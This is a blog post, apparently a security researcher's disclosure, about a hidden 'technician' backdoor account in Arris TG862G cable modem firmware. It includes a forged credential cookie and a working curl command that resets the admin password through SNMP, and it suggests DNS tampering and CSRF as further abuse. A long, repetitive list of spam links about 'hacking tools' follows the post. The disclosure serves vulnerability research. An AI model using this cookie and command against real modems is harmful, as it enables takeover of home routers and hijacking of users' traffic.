Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW
After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}And finally:
{"credential":"technician:"}Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(
That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.
Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:
That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:
Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OKWhat about setting a new value? Surely that will not work....
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:
This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.
The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this
Related news
- Pentest Tools Website Vulnerability
- Hacker Tools Mac
- Pentest Tools Alternative
- Hacker Tools Free Download
- Hacker Tools 2020
- Pentest Tools Port Scanner
- Hacking Apps
- Hacking Tools Windows
- Hacker Tools Github
- Pentest Tools Bluekeep
- Pentest Tools For Android
- Hacking Tools Windows
- Hacking Tools Kit
- Hacking Tools Download
- Pentest Tools Download
- Hack Tools Github
- Hacker Techniques Tools And Incident Handling
- Hacking Tools Free Download
- Easy Hack Tools
- How To Install Pentest Tools In Ubuntu
- Pentest Tools Windows
- Beginner Hacker Tools
- Pentest Tools Kali Linux
- Pentest Tools Github
- Hack App
- Hacker Tools Software
- Hack Tools Download
- Hacker Tools For Pc
- Bluetooth Hacking Tools Kali
- Hacker Tools For Mac
- Hacker Tools
- Game Hacking
- Hacking App
- Github Hacking Tools
- Pentest Tools Framework
- Black Hat Hacker Tools
- Kik Hack Tools
- Hacker
- Pentest Tools Download
- Hacker Tools Free Download
- Hacker Tools For Windows
- Hacker Techniques Tools And Incident Handling
- Hacking Tools Kit
- Hacking Tools Software
- Hack Tool Apk
- Easy Hack Tools
- Hacking Tools Github
- Pentest Tools Apk
- Hacker Techniques Tools And Incident Handling
- Hacking Tools 2020
- Pentest Tools Apk
- Pentest Automation Tools
- Hack Tools
- Hacking Apps
- Hack Tools Online
- Pentest Tools Free
- Bluetooth Hacking Tools Kali
- How To Hack
- Pentest Tools Android
- Pentest Tools Download
- Hacking Tools For Windows 7
- Hacking Tools Software
- Nsa Hack Tools
- Hacking Tools Name
- Hack Tools 2019
- Hackrf Tools
- Game Hacking
- Blackhat Hacker Tools
- Hack Tools Github
- Beginner Hacker Tools
- Hacking Tools For Beginners
- Hacking Tools For Beginners
- Hacker Tools Windows
- Pentest Tools Online
- Android Hack Tools Github
- Pentest Tools Alternative
- Pentest Tools Framework
- Hack And Tools
- Github Hacking Tools
- Hacker Tools Linux
- Hak5 Tools
- Hacker Tools Free Download
- Ethical Hacker Tools
- Pentest Tools For Windows
- Pentest Tools Alternative
- Pentest Tools Apk
- Hacking Tools Github
- Hacking Tools 2020
- Physical Pentest Tools
- Hacker Tools For Pc
- Hacking Tools For Pc
- Hack Tools Online
- Pentest Tools Alternative
- Hacking Tools 2020
- Pentest Box Tools Download
- Pentest Tools Website
- How To Make Hacking Tools
- Kik Hack Tools
- Nsa Hack Tools Download
- Black Hat Hacker Tools
- Hacking Tools Mac
- Hacker Tools
- Hacker Search Tools
- Hacking Tools Kit
- Hacker
- Hacker Tools Hardware
- Nsa Hacker Tools
- Hacking Tools Name
- Hacking Tools
- Hacking Tools For Games
- Hack Tools Github
- Hack Website Online Tool
- Pentest Tools Free
- Best Hacking Tools 2019
- Hacking Tools Download
- Hacking Apps
- Best Hacking Tools 2020
- Best Pentesting Tools 2018
- Easy Hack Tools
- How To Make Hacking Tools
- Hacker Tools For Windows
- Hacking Tools 2020
- Hacker Tools Apk Download
- Hacking Tools For Mac
- Nsa Hacker Tools
- Hak5 Tools
- Hak5 Tools
- Growth Hacker Tools
- Growth Hacker Tools
- Install Pentest Tools Ubuntu
- Hacker Search Tools
- Hacker Tools Windows
- Hacking Tools For Windows
- Hack Tools For Pc
- Hacking Tools For Games
- Hacker Tools 2019
- Hacking Tools For Kali Linux
- Hacker Tools Apk Download
- Hacking Tools Mac
- Hack App
- Hacking Tools For Kali Linux
- Pentest Tools Website Vulnerability
- Pentest Tools Website Vulnerability
- Hack Tool Apk
- Hacking Tools For Windows Free Download
- Hacking Tools Usb
- Hacking Tools For Kali Linux
- Hacker Tools Github
- Usb Pentest Tools
- Pentest Tools Website
- Hacker Tools Windows
- Pentest Tools Apk
- Hacking Tools Online
- Tools 4 Hack
- Pentest Tools For Mac
- Hack Tools For Windows
- Pentest Tools Tcp Port Scanner
- Android Hack Tools Github
- Hacking Tools 2019
- Growth Hacker Tools
- Pentest Tools Android
- Hacker
- Hacking Tools Download
- Free Pentest Tools For Windows
- Pentest Tools
- Hacking Tools Kit
- Top Pentest Tools
- Game Hacking
- Pentest Tools Review
- Growth Hacker Tools
- Hacking App
- Pentest Tools Windows
- Blackhat Hacker Tools
- Nsa Hacker Tools
- New Hacker Tools
- Best Hacking Tools 2020
- How To Hack
No comments:
Post a Comment